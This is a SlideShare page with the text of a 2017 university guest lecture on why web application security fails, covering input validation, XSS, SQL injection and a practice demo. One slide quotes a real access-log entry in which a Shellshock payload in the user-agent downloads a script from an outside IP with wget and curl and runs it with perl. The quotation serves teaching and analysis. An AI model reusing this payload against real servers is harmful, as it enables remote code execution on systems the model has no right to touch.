SlideShare a Scribd company logo

Webapp security-tut-2017

L
lokori

Web application security, how and why it fails? Guest lecture at TUT, spring 2017.

Technology
1 of 37
Download to read offline
HOW AND WHY WEB APP SECURITY FAILS? 16.2. 2017 Tampere University of Technology Antti.virtanen@solita.fi Twitter: @Anakondantti
FOREWORD, 1 MINUTE › Solita? › Me? › Web application? • Much more important than you may realize..
AGENDA › How to make secure software? › … But, everything is broken! › … Because ... • Same mistakes are repeated. • Unthinkable, Unpossible, Impossiblator happens › Practical web application security testing. › Bonus: 10. fail 20. goto 10
SECURITY IS RISK MANAGEMENT
”“If you know the enemy and know yourself, you need not fear the result of a hundred battles. ” Sun Tzu, Art of War
Source: Hackerman, Kung Fury movie Source: NSA recruitment video. Source: securityintelligence.com Source: Lizard Squad hacking group logo
SOLITA #DEVSEC LANDSCAPE
GOOD NEWS: SECURITY IS SIMPLE! Bad news: Simple != easy
RECIPE FOR SECURE SOFTWARE 1. Design it properly. Do the right thing. 2. Do it right 1. Mistake in implementation = bug = security issue 3. Prepare for the unthinkable (Bug bounties etc. are useful too, but out of scope here.)
DO THE RIGHT THING 1. Don’t roll your own. 1. Especially, don’t invent hash algorithms, RND or crypto! 2. Seriously. Failure imminent and certain. 2. Follow best practices. 3. Understand what you are doing. 1. Read the RFC. Understand your tools and libs.
SOMETHING UNTHINKABLE It’s the same story every day..
UNTHINKABLE NAMES?
UNTHINKABLE DOMAINS AND DNS RECORDS (PUNY CODE ATTACK)
A PICTURE IS WORTH 1000 WORDS › Demo-time: SVG is a picture file, right? › Feeling lucky, punk?
WHAT THE ACTUAL **** ??
INPUT SANITATION = 80% WIN
THE SAME STORY ALL OVER! › XSS, CSRF, SQL injection, XXE.. • Are all about input validation. › Solution: white list allowed, deny everythingelse. › There’s still 20% left • You can fail session management certainly, but.. • Follow the advice: Don’t invent your own and you’ll be pretty safe.
JAVASCRIPT NECESSARY (?) EVIL
JAVASCRIPT IS FULL OF EVIL (GREPPING “EVIL” FROM JS SOURCES)
The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute,. Arnold“Iceman” Schwarzenegger, movie Pwningiron.
DEMO/PRACTICE AGAINST GRUYERE http://google-gruyere.appspot.com/
LET’S XSS ! › Reflected vs. Stored › <script> doesn’t work? • No problem, JS is everywhere.. › Can’t XMLHttpRequest? • No prob, counter and fake
SQL INJECTION › GRUYERE does not contain SQL injection.. › But .. It’s a good example of an injection › SQL = Structured Query Language • However, “query” is a bit of a misnomer.. What is this???
INPUT SANITATION, STILL FAILING
LOGIC ATTACKS ARE DIFFICULT › Real example..
REAL WORLD ATTACK
FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED) › 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print- wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid: Google tip:Shellshock
WHAT THE ATTACKER WANTED? efixx– first lines.. core – first lines..
DEV OR OPS? OR #DEVSEC ? › Who is responsible for that server? › Do you need to care as a developer? › Ultimately: What is the developer’s responsibility?
SOME FAILS 2016-­2017 Stories from the trenches
FAIL 1: THE BURDEN OF LEGACY MD5 & C++ -­ “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE” › Native code is dangerous.. • ASLR & DEP make buffer overflows more difficult to exploit, but it still happens. › The lifespan of software can be surprisingly long.. • How to update and re-evaluate working software if nothing happens? • Home-exercise: Sell this to team & customer. Involves risk and cost. › New threats have emerged. • What parts are affected?
Screeshot removed.. FAIL 2: SHORTCUTS AND ANARCHY › Root cause: Heavy process, not understood / accepted by devs • making developers miserable.. › The devs are innovative people.. http//unauthorized.. V 1.3 coolserver AwesomeSoftware_Upgrade.exe
FAIL 3: “I ACCIDENTALLY”
STORY 4: THE WEBHACK EVENT › http://webhack.fi was a light-weight fun bug bounty hunt.. • The targets are not publicly accessible, but were production systems we created for our customers. › Hackers hacked.. › .. SQL injection -> dumped the whole database › .. But our code was fine! WAT?
ONE DOES NOT SIMPLY INJECT INTO.. › One issue turned out to be a 0-day in Spring libraries.. › Hnggh.. › The moral of the story is two-fold: 1. even if you do everything right, you can still fail 2. it’s not always so easy in real life.. › The gory details: https://github.com/solita/sqli-poc
FURTHER MATERIAL • Fromthe internet: • OWASP Top10 • https://www.owasp.o rg/index.php/Categor y:OWASP_Top_Ten_ Project • OWASP ZAP proxy • https://www.owasp.o rg/index.php/OWAS P_Zed_Attack_Proxy _Project • KaliLinux • https://www.kali.org /
Webapp security-tut-2017

Recommended

Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)ClubHack
 
Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013Nick Galbreath
 
Performance - a challenging craft
Performance - a challenging craftPerformance - a challenging craft
Performance - a challenging craftFabian Lange
 
Easy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.comEasy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.comadelardbrown2
 
Fixing security by fixing software development
Fixing security by fixing software developmentFixing security by fixing software development
Fixing security by fixing software developmentNick Galbreath
 
Let's pwn a chinese web browser!
Let's pwn a chinese web browser!Let's pwn a chinese web browser!
Let's pwn a chinese web browser!Juho Nurminen
 
Failure the-good-parts
Failure the-good-partsFailure the-good-parts
Failure the-good-partslegendofklang
 
Good rules for bad apps
Good rules for bad appsGood rules for bad apps
Good rules for bad appsShem Magnezi
 

Recommended

Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)ClubHack
 
Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013Nick Galbreath
 
Performance - a challenging craft
Performance - a challenging craftPerformance - a challenging craft
Performance - a challenging craftFabian Lange
 
Easy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.comEasy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.comadelardbrown2
 
Fixing security by fixing software development
Fixing security by fixing software developmentFixing security by fixing software development
Fixing security by fixing software developmentNick Galbreath
 
Let's pwn a chinese web browser!
Let's pwn a chinese web browser!Let's pwn a chinese web browser!
Let's pwn a chinese web browser!Juho Nurminen
 
Failure the-good-parts
Failure the-good-partsFailure the-good-parts
Failure the-good-partslegendofklang
 
Good rules for bad apps
Good rules for bad appsGood rules for bad apps
Good rules for bad appsShem Magnezi
 
A Responsive Process
A Responsive ProcessA Responsive Process
A Responsive Processdaveruse
 
10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find ThemRosie Sherry
 
10 Things I Hate about DevOps
10 Things I Hate about DevOps10 Things I Hate about DevOps
10 Things I Hate about DevOpsDave Cliffe
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
Way to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comWay to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comadelardbrown2
 
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Jeff Sonstein
 
Avoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAvoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAffiliate Summit
 
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Michele Butcher-Jones
 
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Nick Galbreath
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOpslokori
 
Real world software launch
Real world software launchReal world software launch
Real world software launchKunal Johar
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven developmentPROIDEA
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsYevgeniy Brikman
 
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at FlickrJohn Allspaw
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java VulnerabilitiesSteve Poole
 
DevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentDevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentJohannes Brodwall
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)Wooga
 
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Jinju Jang
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?Andrii Dzynia
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsn|u - The Open Security Community
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 
Phd final
Phd finalPhd final
Phd finalPositive Hack Days
 

More Related Content

What's hot

A Responsive Process
A Responsive ProcessA Responsive Process
A Responsive Processdaveruse
 
10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find ThemRosie Sherry
 
10 Things I Hate about DevOps
10 Things I Hate about DevOps10 Things I Hate about DevOps
10 Things I Hate about DevOpsDave Cliffe
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
Way to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comWay to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comadelardbrown2
 
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Jeff Sonstein
 
Avoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAvoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAffiliate Summit
 
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Michele Butcher-Jones
 

What's hot (8)

A Responsive Process
A Responsive ProcessA Responsive Process
A Responsive Process
 
10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them
 
10 Things I Hate about DevOps
10 Things I Hate about DevOps10 Things I Hate about DevOps
10 Things I Hate about DevOps
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
Way to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comWay to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.com
 
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
 
Avoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAvoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on Marketing
 
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
 

Similar to Webapp security-tut-2017

Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Nick Galbreath
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOpslokori
 
Real world software launch
Real world software launchReal world software launch
Real world software launchKunal Johar
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven developmentPROIDEA
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsYevgeniy Brikman
 
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at FlickrJohn Allspaw
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java VulnerabilitiesSteve Poole
 
DevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentDevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentJohannes Brodwall
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)Wooga
 
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Jinju Jang
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?Andrii Dzynia
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsn|u - The Open Security Community
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 
From dev to ops and beyond - getting it done
From dev to ops and beyond - getting it doneFrom dev to ops and beyond - getting it done
From dev to ops and beyond - getting it doneEdorian
 
Software Debugging for High-altitude Balloons
Software Debugging for High-altitude BalloonsSoftware Debugging for High-altitude Balloons
Software Debugging for High-altitude Balloonsjgrahamc
 
Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!harshit040591
 
Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Fabrizio Cilli
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
 

Similar to Webapp security-tut-2017 (20)

Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOps
 
Real world software launch
Real world software launchReal world software launch
Real world software launch
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
 
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
 
DevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentDevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web Development
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)
 
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
 
Phd final
Phd finalPhd final
Phd final
 
From dev to ops and beyond - getting it done
From dev to ops and beyond - getting it doneFrom dev to ops and beyond - getting it done
From dev to ops and beyond - getting it done
 
Software Debugging for High-altitude Balloons
Software Debugging for High-altitude BalloonsSoftware Debugging for High-altitude Balloons
Software Debugging for High-altitude Balloons
 
TDD Updated
TDD UpdatedTDD Updated
TDD Updated
 
Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!
 
Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 

More from lokori

Smart Locks - too clever by half
Smart Locks - too clever by halfSmart Locks - too clever by half
Smart Locks - too clever by halflokori
 
Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019lokori
 
Developer is an attack vector
Developer is an attack vectorDeveloper is an attack vector
Developer is an attack vectorlokori
 
DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!lokori
 
TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017lokori
 
Tga2015 documentationpipeline
Tga2015 documentationpipelineTga2015 documentationpipeline
Tga2015 documentationpipelinelokori
 
Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014lokori
 
Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014lokori
 
Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013lokori
 

More from lokori (9)

Smart Locks - too clever by half
Smart Locks - too clever by halfSmart Locks - too clever by half
Smart Locks - too clever by half
 
Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019
 
Developer is an attack vector
Developer is an attack vectorDeveloper is an attack vector
Developer is an attack vector
 
DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!
 
TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017
 
Tga2015 documentationpipeline
Tga2015 documentationpipelineTga2015 documentationpipeline
Tga2015 documentationpipeline
 
Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014
 
Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014
 
Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013
 

Recently uploaded

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 

Recently uploaded (20)

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
